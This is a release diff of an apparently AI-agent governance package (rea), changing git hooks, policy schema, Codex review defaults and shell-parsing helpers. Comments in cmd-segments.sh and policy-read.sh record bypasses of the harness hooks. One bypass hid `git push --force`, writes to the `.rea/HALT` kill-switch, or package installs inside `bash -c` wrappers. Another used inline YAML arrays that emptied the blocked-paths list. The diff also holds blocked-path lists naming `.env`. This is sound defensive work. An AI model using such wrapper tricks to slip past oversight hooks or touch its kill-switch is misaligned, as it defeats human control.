@bookedsolid/rea 0.16.4 → 0.18.0

package/.husky/commit-msg

@@ -78,9 +78,17 @@ BLOCKED=0
 MATCHES=""
 
 # Pattern 1: Co-Authored-By with noreply@ email
-if grep -qiE 'Co-Authored-By:.*noreply@' "$COMMIT_MSG_FILE" 2>/dev/null; then
+# 0.18.0 helix-020 / discord-ops Round 10 #3 fix (G4.B):
+# the pre-fix pattern `Co-Authored-By:.*noreply@` matched both AI-tool
+# noreply addresses AND legitimate `<user>@users.noreply.github.com`
+# collaborator credits — blocking honest co-author footers from human
+# contributors. Refined to enumerate AI-tool noreply domains explicitly;
+# Pattern 2 below catches Co-Authored-By with named tools regardless of
+# email, so dropping users.noreply.github.com from this branch only
+# relaxes the check for human collaborators — never for AI.
+if grep -qiE 'Co-Authored-By:.*noreply@(anthropic\.com|openai\.com|github-copilot|github\.com|claude\.ai|chatgpt\.com|googlemail\.com|google\.com|cursor\.com|codeium\.com|tabnine\.com|amazon\.com|amazonaws\.com|amazon-q\.amazonaws\.com|cody\.dev|sourcegraph\.com)' "$COMMIT_MSG_FILE" 2>/dev/null; then
   BLOCKED=1
-  MATCHES="${MATCHES}$(grep -niE 'Co-Authored-By:.*noreply@' "$COMMIT_MSG_FILE" 2>/dev/null)
+  MATCHES="${MATCHES}$(grep -niE 'Co-Authored-By:.*noreply@(anthropic\.com|openai\.com|github-copilot|github\.com|claude\.ai|chatgpt\.com|googlemail\.com|google\.com|cursor\.com|codeium\.com|tabnine\.com|amazon\.com|amazonaws\.com|amazon-q\.amazonaws\.com|cody\.dev|sourcegraph\.com)' "$COMMIT_MSG_FILE" 2>/dev/null)
 "
 fi
 

package/agents/codex-adversarial.md

@@ -32,13 +32,18 @@ You may read additional files in the repo if needed for context, but do so read-
 1. **Check HALT and policy** — read `.rea/policy.yaml`, check `.rea/HALT`. If frozen, stop immediately.
 2. **Validate Codex availability** — if `/codex` is not installed, report and stop. Do not silently fall back to another reviewer.
 3. **Prepare the Codex invocation** — construct the adversarial-review prompt with the diff, commit log, and any relevant context files.
-4. **Invoke `/codex:adversarial-review`** — this call flows through the REA middleware chain (audit → kill-switch → tier → policy → redact → injection → execute → result-size-cap).
+4. **Invoke `/codex:adversarial-review --model gpt-5.4`** — pass the `--model` flag explicitly to pin the iron-gate model regardless of plugin defaults or `~/.codex/config.toml` resolution. The codex-companion script accepts `--model` (see `codex-companion.mjs:684`). This call flows through the REA middleware chain (audit → kill-switch → tier → policy → redact → injection → execute → result-size-cap).
 
    **Model pinning (0.16.1+):** when the codex plugin's adversarial-review supports model overrides, request `gpt-5.4` with `model_reasoning_effort: high` to match the push-gate's iron-gate defaults. Pre-0.16.1, in-session adversarial reviews ran on whatever the plugin defaulted to (likely `codex-auto-review` at medium reasoning) — meaningfully WEAKER than the push-gate's `gpt-5.4` + `high`. This caused a "in-session review passes, push-gate review fails" pattern reported by helix across 014 / 015 / 016. If the plugin call accepts model parameters, pass them. If it does not, fall back to invoking `codex exec review --base <ref> --json --ephemeral -c model="gpt-5.4" -c model_reasoning_effort="high"` directly via `Bash` — same shape the push-gate uses (see `src/hooks/push-gate/codex-runner.ts::runCodexReview`). The cost of the stronger model is small relative to the cost of shipping a release with a P1 bypass that gets caught at consumer push time.
 5. **Parse the Codex output** — extract structured findings.
 6. **Classify findings** by category: security, correctness, edge cases, test gaps, API design, performance.
 7. **Assign verdict**: `pass` (no material findings), `concerns` (findings worth addressing but not blocking), `blocking` (findings that must be fixed before merge).
-8. **Emit an audit entry — REQUIRED** for every `/codex-review` invocation. The pre-push gate does not consult audit records to decide pass/fail (post-0.11.0 the gate is stateless), but the `/codex-review` slash command's Step 3 verifies an audit entry was appended for this run and surfaces "review never happened" to the user when one is missing. The two specs are a contract pair — audit emission is what tells the operator their interactive review actually completed. Append via the public `@bookedsolid/rea/audit` helper:
+8. **Emit an audit entry — REQUIRED** for every `/codex-review` invocation. This is one of three identical contract checkpoints:
+   - The runtime always emits (`src/hooks/push-gate/index.ts` calls `appendAuditRecord` via `safeAppend` on every completed review — see `EVT_REVIEWED`).
+   - This agent always emits (this step).
+   - The `/codex-review` slash command's Step 3 verifies the entry exists and surfaces "review never happened" as a failure if it does not.
+
+   The pre-push gate does not consult audit records to decide pass/fail (post-0.11.0 the gate is stateless), but the audit record is still the operator's only forensic trail for an interactive review. Without it, "did this review actually happen" becomes unanswerable. Reconciled in 0.18.0 (helixir Finding #6 across cycles 1–7) so the three documents — `commands/codex-review.md`, `agents/codex-adversarial.md`, `src/hooks/push-gate/index.ts` — describe the same contract in identical wording. Append via the public `@bookedsolid/rea/audit` helper:
 
    ```ts
    import { appendAuditRecord, CODEX_REVIEW_TOOL_NAME, CODEX_REVIEW_SERVER_NAME, Tier, InvocationStatus } from '@bookedsolid/rea/audit';

package/commands/codex-review.md

@@ -55,17 +55,21 @@ Invoke the `codex-adversarial` agent with:
 
 The agent wraps `/codex:adversarial-review` and returns structured findings.
 
-## Step 3 — (Optional) verify audit entry
+## Step 3 — Verify audit entry — REQUIRED
 
-Audit emission is **optional** in 0.11.0+. The pre-push gate is stateless and does not consult audit records to decide pass/fail; the agent's structured findings ARE the review. The agent will append an audit entry when it helps forensic traceability (intermittent verdicts, review-history audits) but its absence is not a failure.
+The `codex-adversarial` agent **MUST** emit an audit entry for every invocation. This is the same contract documented in `agents/codex-adversarial.md` Step 4 and matches the runtime behavior of `rea hook push-gate` (which always calls `appendAuditRecord` on a completed review — see `src/hooks/push-gate/index.ts`'s `EVT_REVIEWED` path).
 
-If you want to confirm an entry was written for this run:
+Verify the entry was written:
 
 ```bash
 tail -n 1 .rea/audit.jsonl
 ```
 
-A `codex-adversarial-review` entry with `head_sha`, `target`, `finding_count`, and `verdict` fields is informative — but DO NOT treat its absence as a failure. The review happened if the agent returned text. (Pre-0.15.0 this step was a hard verification gate that contradicted the agent's "audit optional" contract — see Helix Finding 3, 2026-05-03.)
+The expected entry has `tool_name: "codex.review"`, `server_name: "codex"`, and `metadata` containing `head_sha`, `target`, `finding_count`, and `verdict`. If the entry is missing, the review **did not complete its contract** — surface that to the user as a failure.
+
+**Why audit emission is required even though the pre-push gate is stateless:** the 0.11.0 push-gate decides pass/fail on Codex's live verdict, not on a receipt in the audit log — but the audit record is still the operator's only forensic trail for an interactive `/codex-review` run. Without it, "did this review actually happen" becomes unanswerable, which is exactly the failure mode helixir flagged across rounds 65/66/73 in the 0.13–0.17 cycle. Runtime always emits; the agent always emits; the slash command verifies. Three checkpoints, one contract.
+
+(Earlier docs in 0.15+ said this step was "optional"; that wording contradicted both the agent's Step 4 and the runtime behavior of `safeAppend` in `src/hooks/push-gate/index.ts`. Reconciled in 0.18.0 — helixir Finding #6 across cycles 1–7.)
 
 ## Step 4 — Report
 

package/dist/cli/init.js

@@ -233,10 +233,28 @@ async function printCodexInstallAssist() {
     console.log('  Install via the Claude Code Codex plugin helper: `/codex:setup`,');
     console.log('  or set `review.codex_required: false` in .rea/policy.yaml to opt out.');
 }
+function readExistingInstalledAt(policyPath) {
+    try {
+        if (!fs.existsSync(policyPath))
+            return undefined;
+        const raw = fs.readFileSync(policyPath, 'utf8');
+        const m = raw.match(/^installed_at:\s*"([^"]+)"\s*$/m);
+        return m ? m[1] : undefined;
+    }
+    catch {
+        return undefined;
+    }
+}
 function writePolicyYaml(targetDir, config, layered) {
     const policyPath = path.join(targetDir, REA_DIR, POLICY_FILE);
     const installedBy = process.env.USER ?? os.userInfo().username ?? 'unknown';
-    const installedAt = new Date().toISOString();
+    // 0.17.0 idempotency: preserve the original `installed_at` if a policy
+    // already exists. Without this, every `rea init` re-stamps the field
+    // and produces a non-idempotent diff. The first install date is the
+    // semantically correct value — re-runs reflect refreshes, not new
+    // installs. Falls back to `new Date()` only when the file is absent
+    // or unparseable.
+    const installedAt = readExistingInstalledAt(policyPath) ?? new Date().toISOString();
     const lines = [];
     lines.push(`# .rea/policy.yaml — managed by rea v${getPkgVersion()}`);
     lines.push(`# Edit carefully: tightening takes effect on next load; loosening requires human approval.`);
@@ -349,14 +367,36 @@ async function writeInstallManifest(targetDir, profile, fragmentInput) {
         sha256: sha256OfBuffer(buildFragment(fragmentInput)),
         source: 'claude-md',
     });
+    // 0.17.0 idempotency: preserve the original `installed_at` from a
+    // prior manifest if present. The first install date is the semantic
+    // truth — re-runs reflect refreshes, not new installs.
+    const manifestPath = path.join(targetDir, REA_DIR, 'install-manifest.json');
     const manifest = {
         version: getPkgVersion(),
         profile,
-        installed_at: new Date().toISOString(),
+        installed_at: readExistingManifestInstalledAt(manifestPath) ?? new Date().toISOString(),
         files: entries,
     };
     return writeManifestAtomic(targetDir, manifest);
 }
+function readExistingManifestInstalledAt(manifestPath) {
+    try {
+        if (!fs.existsSync(manifestPath))
+            return undefined;
+        const raw = fs.readFileSync(manifestPath, 'utf8');
+        const parsed = JSON.parse(raw);
+        if (typeof parsed === 'object' &&
+            parsed !== null &&
+            'installed_at' in parsed &&
+            typeof parsed.installed_at === 'string') {
+            return parsed.installed_at;
+        }
+    }
+    catch {
+        // Fall through — caller stamps a fresh date.
+    }
+    return undefined;
+}
 export async function runInit(options) {
     const targetDir = process.cwd();
     const reagentPolicyPath = detectReagentPolicy(targetDir);

package/dist/cli/upgrade.js

@@ -635,7 +635,22 @@ export async function runUpgrade(options = {}) {
     }
     const now = new Date().toISOString();
     const installedAt = existingManifest?.installed_at ?? now;
-    const profile = existingManifest?.profile ?? 'unknown';
+    // 0.18.0 helix-020 G6 fix: pre-fix the upgrade path read profile from
+    // the existing manifest only — and pre-0.2.0 manifests recorded
+    // `"unknown"` as a placeholder. Every subsequent `rea upgrade` then
+    // re-stamped `"unknown"` forever. Authoritative source for the
+    // profile is `.rea/policy.yaml`; the manifest is a derivative
+    // record. Read policy first; fall back to existing manifest only
+    // when policy load fails (covers the bootstrap case where the
+    // manifest exists but policy is malformed).
+    let profile;
+    try {
+        const livePolicy = loadPolicy(resolvedRoot);
+        profile = livePolicy.profile;
+    }
+    catch {
+        profile = existingManifest?.profile ?? 'unknown';
+    }
     const freshManifest = {
         version: getPkgVersion(),
         profile,

package/dist/hooks/push-gate/codex-runner.js

@@ -136,18 +136,29 @@ function escapeTomlString(value) {
  */
 export async function runCodexReview(options) {
     const spawner = options.spawnImpl ?? spawn;
+    // 0.18.0 iron-gate runtime default: ALWAYS pass model + reasoning
+    // effort to codex. Pre-fix, undefined options fell back to codex's
+    // own default (`codex-auto-review` at medium reasoning), which
+    // bypassed the iron-gate intent and let weaker reviews ship. Now
+    // the runtime hardcodes `gpt-5.4` + `high` as the floor; policy
+    // can OVERRIDE to a different model/effort but cannot opt out into
+    // codex's defaults (config.toml or otherwise). The user's directive
+    // — "we want codex to be using its BEST. EVERY TIME" — is enforced
+    // here, not at the policy layer.
+    //
     // Model + reasoning overrides go BEFORE the `exec` subcommand because
     // `-c key=value` is a top-level codex CLI flag, not an `exec` flag.
     // Codex's TOML parser interprets the value, so we wrap strings in TOML
     // quotes — `-c model="gpt-5.4"` not `-c model=gpt-5.4` — to ensure the
     // value lands as a string regardless of upstream parsing changes.
-    const overrideArgs = [];
-    if (options.model !== undefined && options.model.length > 0) {
-        overrideArgs.push('-c', `model="${escapeTomlString(options.model)}"`);
-    }
-    if (options.reasoningEffort !== undefined) {
-        overrideArgs.push('-c', `model_reasoning_effort="${escapeTomlString(options.reasoningEffort)}"`);
-    }
+    const effectiveModel = options.model !== undefined && options.model.length > 0 ? options.model : 'gpt-5.4';
+    const effectiveReasoning = options.reasoningEffort ?? 'high';
+    const overrideArgs = [
+        '-c',
+        `model="${escapeTomlString(effectiveModel)}"`,
+        '-c',
+        `model_reasoning_effort="${escapeTomlString(effectiveReasoning)}"`,
+    ];
     const baseArgs = [
         ...overrideArgs,
         'exec',

package/dist/policy/loader.d.ts

@@ -11,6 +11,7 @@ declare const PolicySchema: z.ZodObject<{
     promotion_requires_human_approval: z.ZodBoolean;
     block_ai_attribution: z.ZodDefault<z.ZodBoolean>;
     blocked_paths: z.ZodArray<z.ZodString, "many">;
+    protected_writes: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
     protected_paths_relax: z.ZodDefault<z.ZodArray<z.ZodString, "many">>;
     notification_channel: z.ZodDefault<z.ZodString>;
     injection_detection: z.ZodOptional<z.ZodEnum<["block", "warn"]>>;
@@ -47,10 +48,14 @@ declare const PolicySchema: z.ZodObject<{
          */
         auto_narrow_threshold: z.ZodOptional<z.ZodNumber>;
         /**
-         * Codex CLI model override (0.13.4+). Pinned via `-c model="<name>"` on
-         * every `codex exec review` invocation. When unset, codex's own default
-         * applies — which today is the special-purpose `codex-auto-review`
-         * model at `medium` reasoning, NOT the flagship.
+         * Codex CLI model override (0.13.4+; runtime-default since 0.18.0).
+         * Pinned via `-c model="<name>"` on every `codex exec review`
+         * invocation. **0.18.0 iron-gate runtime default**: when unset, the
+         * runtime hardcodes `gpt-5.4` — codex's own default
+         * (`codex-auto-review` at medium) is no longer reachable through the
+         * rea push-gate. To select a different model, set this key
+         * explicitly. config.toml is consulted ONLY when the explicit value
+         * passed by rea is `undefined`, which the runtime never does.
          *
          * For serious adversarial review on consumer codebases (where verdict
          * stability matters) the recommended setting is `gpt-5.4` with
@@ -174,6 +179,7 @@ declare const PolicySchema: z.ZodObject<{
     blocked_paths: string[];
     protected_paths_relax: string[];
     notification_channel: string;
+    protected_writes?: string[] | undefined;
     injection_detection?: "block" | "warn" | undefined;
     injection?: {
         suspicious_blocks_writes?: boolean | undefined;
@@ -220,6 +226,7 @@ declare const PolicySchema: z.ZodObject<{
     promotion_requires_human_approval: boolean;
     blocked_paths: string[];
     block_ai_attribution?: boolean | undefined;
+    protected_writes?: string[] | undefined;
     protected_paths_relax?: string[] | undefined;
     notification_channel?: string | undefined;
     injection_detection?: "block" | "warn" | undefined;

package/dist/policy/loader.js

@@ -39,10 +39,14 @@ const ReviewPolicySchema = z
      */
     auto_narrow_threshold: z.number().int().nonnegative().optional(),
     /**
-     * Codex CLI model override (0.13.4+). Pinned via `-c model="<name>"` on
-     * every `codex exec review` invocation. When unset, codex's own default
-     * applies — which today is the special-purpose `codex-auto-review`
-     * model at `medium` reasoning, NOT the flagship.
+     * Codex CLI model override (0.13.4+; runtime-default since 0.18.0).
+     * Pinned via `-c model="<name>"` on every `codex exec review`
+     * invocation. **0.18.0 iron-gate runtime default**: when unset, the
+     * runtime hardcodes `gpt-5.4` — codex's own default
+     * (`codex-auto-review` at medium) is no longer reachable through the
+     * rea push-gate. To select a different model, set this key
+     * explicitly. config.toml is consulted ONLY when the explicit value
+     * passed by rea is `undefined`, which the runtime never does.
      *
      * For serious adversarial review on consumer codebases (where verdict
      * stability matters) the recommended setting is `gpt-5.4` with
@@ -160,11 +164,19 @@ const PolicySchema = z
     promotion_requires_human_approval: z.boolean(),
     block_ai_attribution: z.boolean().default(false),
     blocked_paths: z.array(z.string()),
-    // 0.16.3 F7: opt-in relax list. Consumers can list rea-managed
-    // hard-protected patterns they want unblocked (e.g. `.husky/` to
-    // author their own husky hooks). The kill-switch invariants
-    // (`.rea/HALT`, `.rea/policy.yaml`, `.claude/settings.json`) are
-    // ignored if listed — see hooks/_lib/protected-paths.sh.
+    // 0.16.5 F9 (helix-018 Option A): full policy-driven definition of
+    // the rea-managed write-protection list. When set, fully owns the
+    // protected set (kill-switch invariants are always added). When
+    // unset, defaults to the 5 historical patterns. Consumers who want
+    // to ADD a path (e.g. `.github/workflows/`) or remove non-invariant
+    // entries (e.g. `.husky/`) declare the full list here.
+    protected_writes: z.array(z.string()).optional(),
+    // 0.16.3 F7: opt-in subtractor. Removes entries from whatever the
+    // effective protected set is (default OR `protected_writes`).
+    // Kill-switch invariants (`.rea/HALT`, `.rea/policy.yaml`,
+    // `.claude/settings.json`) are silently dropped from the relax
+    // list — see hooks/_lib/protected-paths.sh. Both keys can coexist;
+    // `protected_paths_relax` runs AFTER `protected_writes`.
     protected_paths_relax: z.array(z.string()).default([]),
     notification_channel: z.string().default(''),
     injection_detection: z.enum(['block', 'warn']).optional(),

package/dist/policy/profiles.d.ts

@@ -26,6 +26,7 @@ export declare const ProfileSchema: z.ZodObject<{
     promotion_requires_human_approval: z.ZodOptional<z.ZodBoolean>;
     block_ai_attribution: z.ZodOptional<z.ZodBoolean>;
     blocked_paths: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
+    protected_writes: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
     protected_paths_relax: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
     notification_channel: z.ZodOptional<z.ZodString>;
     injection_detection: z.ZodOptional<z.ZodEnum<["block", "warn"]>>;
@@ -52,6 +53,7 @@ export declare const ProfileSchema: z.ZodObject<{
     promotion_requires_human_approval?: boolean | undefined;
     block_ai_attribution?: boolean | undefined;
     blocked_paths?: string[] | undefined;
+    protected_writes?: string[] | undefined;
     protected_paths_relax?: string[] | undefined;
     notification_channel?: string | undefined;
     injection_detection?: "block" | "warn" | undefined;
@@ -68,6 +70,7 @@ export declare const ProfileSchema: z.ZodObject<{
     promotion_requires_human_approval?: boolean | undefined;
     block_ai_attribution?: boolean | undefined;
     blocked_paths?: string[] | undefined;
+    protected_writes?: string[] | undefined;
     protected_paths_relax?: string[] | undefined;
     notification_channel?: string | undefined;
     injection_detection?: "block" | "warn" | undefined;

package/dist/policy/profiles.js

@@ -48,6 +48,7 @@ export const ProfileSchema = z
     promotion_requires_human_approval: z.boolean().optional(),
     block_ai_attribution: z.boolean().optional(),
     blocked_paths: z.array(z.string()).optional(),
+    protected_writes: z.array(z.string()).optional(),
     protected_paths_relax: z.array(z.string()).optional(),
     notification_channel: z.string().optional(),
     injection_detection: z.enum(['block', 'warn']).optional(),

package/dist/policy/types.d.ts

@@ -268,6 +268,7 @@ export interface Policy {
     promotion_requires_human_approval: boolean;
     block_ai_attribution: boolean;
     blocked_paths: string[];
+    protected_writes?: string[];
     protected_paths_relax: string[];
     notification_channel: string;
     injection_detection?: 'block' | 'warn';

package/hooks/_lib/cmd-segments.sh

@@ -51,6 +51,214 @@
 # do NOT honor `\` escapes; double-quoted spans treat `\"` as a literal
 # `"` and skip past it.
 
+# Unwrap nested shell wrappers — `bash -c 'PAYLOAD'`, `sh -lc "PAYLOAD"`,
+# `zsh -ic 'PAYLOAD'`, etc. Emits the input string AS-IS plus each inner
+# PAYLOAD as a separate line. Pre-0.17.0 the splitter never parsed
+# inside wrapped quotes, so `bash -c 'git push --force'` produced a
+# single segment whose first token was `bash` — defeating every check
+# that uses `any_segment_starts_with`. This helper makes the inner
+# payload visible as its own segment, so every existing detection rule
+# fires uniformly on wrapped and unwrapped commands.
+#
+# Closes helix-017 #1, #2, #3 (0.16.2):
+#   - `bash -lc 'git push --force origin HEAD'`  → payload now seen by H1
+#   - `bash -c 'printf x > .rea/HALT'`           → payload now seen by bash-gate
+#   - `bash -lc 'npm install some-package'`      → payload now seen by audit-gate
+#
+# Recognized wrapper shape (case-insensitive shell name):
+#   (bash|sh|zsh|dash|ksh) [optional -flags...] (-c|-lc|-lic|-ic|-cl|-cli) (QUOTED_ARG)
+#
+# QUOTED_ARG can be single- or double-quoted. Single-quote bodies have no
+# escape semantics. Double-quote bodies treat \" and \\ as literal
+# escapes (per POSIX). Multiple wrappers per command-line are handled
+# (e.g. `foo; bash -c 'bar' && sh -c 'baz'` emits both `bar` and `baz`).
+#
+# 0.18.0 helix-020 G1.A fix: the unwrap pass scans a QUOTE-MASKED form
+# of the input, not the raw input. Pre-fix, a quoted argument that
+# MENTIONED a wrapper (e.g. `git commit -m "docs: mention bash -c 'npm
+# install left-pad'"`) would emit a phantom inner-payload segment, and
+# `dependency-audit-gate.sh` would block the innocent commit. The
+# quote-mask layer (the same one `_rea_split_segments` uses) replaces
+# all in-quote separators AND in-quote single/double quote characters
+# with multi-byte sentinels — so the wrapper regex can no longer match
+# inside an outer quoted span. The unwrapped payload itself is still
+# emitted from the un-masked input by recomputing offsets back to the
+# raw string, so escape semantics inside legitimate wrappers stay
+# correct. We only need the mask to suppress matching; the captured
+# payload is read off the original string.
+#
+# Limitation: ONE level of unwrapping. A wrapper inside a wrapper
+# (`bash -c "bash -c 'innermost'"`) emits only the second-level payload
+# (`bash -c 'innermost'`), not the third-level. This is enough for
+# every consumer-reported bypass; deeper nesting can be added later
+# without changing the contract.
+_rea_unwrap_nested_shells() {
+  local cmd="$1"
+  printf '%s\n' "$cmd"
+  # Build a mask where in-quote `"` `'` `;` `&` `|` characters are
+  # replaced with multi-byte sentinels so the wrapper regex below
+  # cannot match wrapper syntax that lives inside outer quoted prose.
+  # We also mask the in-quote QUOTE characters themselves so the awk
+  # body's quote-state heuristic (which looks at the byte immediately
+  # after the matched wrapper-prefix region) cannot mistake an inner
+  # quote for a payload-opening quote. Sentinel bytes are aligned to
+  # be the same width as their original character (single-byte) so
+  # offsets into the raw string remain valid for payload extraction.
+  #
+  # Approach: rather than synthesize a per-byte sentinel of width 1,
+  # we run the awk wrapper-scan against a SEPARATE masked stream and
+  # then translate matched RSTART/RLENGTH offsets back to the original
+  # string. We do that by passing both strings into awk (raw via stdin,
+  # masked via -v MASKED) and tracking the same index across both —
+  # since the mask substitutes single bytes with single bytes only
+  # (placeholder bytes drawn from the C0 control-character range) the
+  # offsets line up.
+  #
+  # Placeholder bytes — chosen from the C0 control range so they
+  # cannot appear in real shell input under UTF-8 (NUL, BEL, VT, FF
+  # are reserved by some shells; we use SOH/STX/ETX/ENQ/ACK which are
+  # not assigned operational meaning by any shell we ship with).
+  #   \x01 SOH — replaces in-quote `"`
+  #   \x02 STX — replaces in-quote `'`
+  #   \x03 ETX — replaces in-quote `;`
+  #   \x05 ENQ — replaces in-quote `&`
+  #   \x06 ACK — replaces in-quote `|`
+  local masked
+  masked=$(printf '%s' "$cmd" | awk '
+    {
+      line = $0
+      out = ""
+      i = 1
+      n = length(line)
+      mode = 0
+      while (i <= n) {
+        ch = substr(line, i, 1)
+        if (mode == 0) {
+          if (ch == "\"") { mode = 1; out = out ch; i++; continue }
+          if (ch == "'\''") { mode = 2; out = out ch; i++; continue }
+          out = out ch
+          i++
+          continue
+        }
+        if (mode == 2) {
+          if (ch == "'\''") { mode = 0; out = out "\002"; i++; continue }
+          if (ch == ";") { out = out "\003"; i++; continue }
+          if (ch == "&") { out = out "\005"; i++; continue }
+          if (ch == "|") { out = out "\006"; i++; continue }
+          if (ch == "\"") { out = out "\001"; i++; continue }
+          out = out ch
+          i++
+          continue
+        }
+        # mode == 1 (double-quoted)
+        if (ch == "\\" && i < n) {
+          # Preserve the escape pair literally — width preserved.
+          nxt = substr(line, i + 1, 1)
+          out = out ch nxt
+          i += 2
+          continue
+        }
+        if (ch == "\"") { mode = 0; out = out "\001"; i++; continue }
+        if (ch == ";") { out = out "\003"; i++; continue }
+        if (ch == "&") { out = out "\005"; i++; continue }
+        if (ch == "|") { out = out "\006"; i++; continue }
+        if (ch == "'\''") { out = out "\002"; i++; continue }
+        out = out ch
+        i++
+      }
+      printf "%s", out
+    }')
+  # Pass both raw and masked into awk. Wrapper-regex matches against the
+  # masked form; payload extraction reads the raw form using the same
+  # offsets. Because the mask is byte-for-byte width-preserving, the
+  # same RSTART/RLENGTH applies to both.
+  printf '' | awk -v raw="$cmd" -v masked="$masked" '
+    BEGIN {
+      # Wrapper-prefix regex: shell-name + optional flag tokens + -c-style flag.
+      # Each flag token is `-` followed by 1+ letters and trailing space.
+      # NOTE: matches only OUTSIDE outer quoted spans because in-quote
+      # `"`, `'\''`, `;`, `&`, `|` are masked out in `masked`. The leading
+      # alternation `(^|[[:space:]&|;])` therefore cannot anchor on a
+      # masked separator, and the shell-name token itself can no longer
+      # appear adjacent to a masked quote-introducer.
+      WRAP = "(^|[[:space:]&|;])(bash|sh|zsh|dash|ksh)([[:space:]]+-[a-zA-Z]+)*[[:space:]]+-(c|lc|lic|ic|cl|cli|li|il)[[:space:]]+"
+      # Track the cursor in BOTH raw and masked. Because the mask is
+      # byte-for-byte width-preserving, the same RSTART/RLENGTH applies
+      # to both — but each iteration of the loop must SLICE both strings
+      # by the same amount so subsequent matches see synchronized tails.
+      mrest = masked
+      rrest = raw
+      while (length(mrest) > 0) {
+        if (! match(mrest, WRAP)) break
+        # Tail begins immediately after the matched wrapper prefix in
+        # BOTH strings (offsets line up — mask is width-preserving).
+        mtail = substr(mrest, RSTART + RLENGTH)
+        rtail = substr(rrest, RSTART + RLENGTH)
+        # The wrapper-payload-introducing quote must be a REAL outer
+        # quote — i.e. not a masked in-quote sentinel. Probe the raw
+        # form for the introducer character, which the mask preserved
+        # verbatim only when it was an outer quote.
+        first = substr(rtail, 1, 1)
+        mfirst = substr(mtail, 1, 1)
+        if (first == "'\''" && mfirst == "'\''") {
+          # Single-quoted body: no escape semantics; runs to next `'\''`.
+          body = substr(rtail, 2)
+          mbody = substr(mtail, 2)
+          end = index(body, "'\''")
+          if (end == 0) {
+            mrest = substr(mtail, 2)
+            rrest = substr(rtail, 2)
+            continue
+          }
+          payload = substr(body, 1, end - 1)
+          print payload
+          mrest = substr(mbody, end + 1)
+          rrest = substr(body, end + 1)
+          continue
+        }
+        if (first == "\"" && mfirst == "\"") {
+          # Double-quoted body: \" and \\ are literal escapes.
+          body = substr(rtail, 2)
+          n = length(body)
+          j = 1
+          out = ""
+          closed = 0
+          while (j <= n) {
+            c = substr(body, j, 1)
+            if (c == "\\" && j < n) {
+              nxt = substr(body, j + 1, 1)
+              if (nxt == "\"" || nxt == "\\") { out = out nxt; j += 2; continue }
+              out = out c nxt
+              j += 2
+              continue
+            }
+            if (c == "\"") { closed = j; break }
+            out = out c
+            j++
+          }
+          if (closed == 0) {
+            mrest = substr(mtail, 2)
+            rrest = substr(rtail, 2)
+            continue
+          }
+          print out
+          # Skip past the opening `"` (1 byte) AND the closing `"` (1
+          # byte at body[closed], i.e. mtail[closed+1]). Cursor lands
+          # at mtail[closed+2].
+          mrest = substr(mtail, closed + 2)
+          rrest = substr(rtail, closed + 2)
+          continue
+        }
+        # Non-quoted argument — proceed past the matched prefix only.
+        mrest = mtail
+        rrest = rtail
+      }
+    }
+    # Empty action with no input rules — explicitly drive the loop from
+    # END so awk does not require any input records.
+    END {}'
+}
+
 # Split $1 on shell command separators. Emits one segment per line on
 # stdout (empty segments preserved). Used by both higher-level helpers
 # below; not generally called by hooks directly.
@@ -103,7 +311,14 @@ _rea_split_segments() {
   # splitting so quoted prose no longer over-splits and anchors trigger
   # words at the head of phantom segments. See header comment for the
   # full rationale.
-  printf '%s' "$cmd" \
+  #
+  # 0.17.0 helix-017 #1-#3 fix: unwrap `bash -c 'PAYLOAD'` style
+  # wrappers BEFORE the quote-mask + split passes. The unwrap step
+  # emits the original line plus each inner PAYLOAD as separate
+  # records; the existing pipeline then quote-masks and splits each
+  # record independently. Inner payload anchors trigger words for the
+  # `any_segment_*` checks downstream.
+  _rea_unwrap_nested_shells "$cmd" \
     | awk '
         BEGIN {
           SC  = "__REA_SEP_SC_a8f2c1__"

package/hooks/_lib/policy-read.sh

@@ -53,20 +53,80 @@ policy_bool_true() {
   [[ "$value" == "true" ]]
 }
 
-# Read a list of scalars from a top-level sequence block.
+# Read a list of scalars from a top-level sequence.
 # Usage: mapfile -t patterns < <(policy_list "delegate_to_subagent")
-# Handles inline "[]" as empty. Stops at the first non-"-" continuation line.
+#
+# Recognized YAML forms:
+#
+#   1. Block sequence (the historical / canonical form):
+#        blocked_paths:
+#          - .env
+#          - .env.*
+#          - .rea/HALT
+#
+#   2. Empty inline array (since 0.1.x):
+#        blocked_paths: []      # → no entries (returns successfully)
+#
+#   3. Non-empty inline array (added 0.18.0 G1.B/G1.C):
+#        blocked_paths: [.env, .env.*, .rea/HALT]
+#
+# Inline arrays may span multiple lines:
+#
+#        blocked_paths: [
+#          .env,
+#          .env.*,
+#          .rea/HALT
+#        ]
+#
+# Quoted entries (single or double quotes) are unquoted. Leading and
+# trailing whitespace on each entry is trimmed. Empty entries (e.g. from
+# a trailing `,`) are skipped silently.
+#
+# Pre-fix (G1.B/G1.C): the inline array form was VALID YAML but parsed
+# to an empty list — silent bypass of `blocked-paths-bash-gate.sh` and
+# silent ignore of `protected_writes` overrides. Fixed by extending the
+# parser to recognize the inline form in addition to the block form.
+#
+# The block form is still preferred (sed-friendly, line-aligned diffs)
+# but the inline form is now equally enforced.
 policy_list() {
   local key="$1"
   local policy
   policy=$(policy_path)
   [[ -z "$policy" ]] && return 0
   local in_block=0
+  local in_inline=0
+  local inline_buf=""
   while IFS= read -r line; do
+    # Skip while we're collecting an inline-array body across lines.
+    if [[ $in_inline -eq 1 ]]; then
+      inline_buf="${inline_buf} ${line}"
+      # Detect the closing `]` (any position on the line).
+      if printf '%s' "$line" | grep -qE '\]'; then
+        _policy_emit_inline_array "$inline_buf"
+        return 0
+      fi
+      continue
+    fi
     if printf '%s' "$line" | grep -qE "^[[:space:]]*${key}:"; then
-      if printf '%s' "$line" | grep -qE "${key}:[[:space:]]*\[\]"; then
+      # Empty inline `[]` — explicit empty list.
+      if printf '%s' "$line" | grep -qE "${key}:[[:space:]]*\[[[:space:]]*\]"; then
         return 0
       fi
+      # Non-empty inline `[ ... ]` — parse the bracketed body. May or
+      # may not close on the same line.
+      if printf '%s' "$line" | grep -qE "${key}:[[:space:]]*\["; then
+        # Strip everything up to and including the opening `[`.
+        inline_buf=$(printf '%s' "$line" | sed -E "s/^.*${key}:[[:space:]]*\[//")
+        if printf '%s' "$inline_buf" | grep -qE '\]'; then
+          # Single-line inline array.
+          _policy_emit_inline_array "$inline_buf"
+          return 0
+        fi
+        in_inline=1
+        continue
+      fi
+      # Block-form sequence header — entries follow on subsequent lines.
       in_block=1
       continue
     fi
@@ -80,3 +140,31 @@ policy_list() {
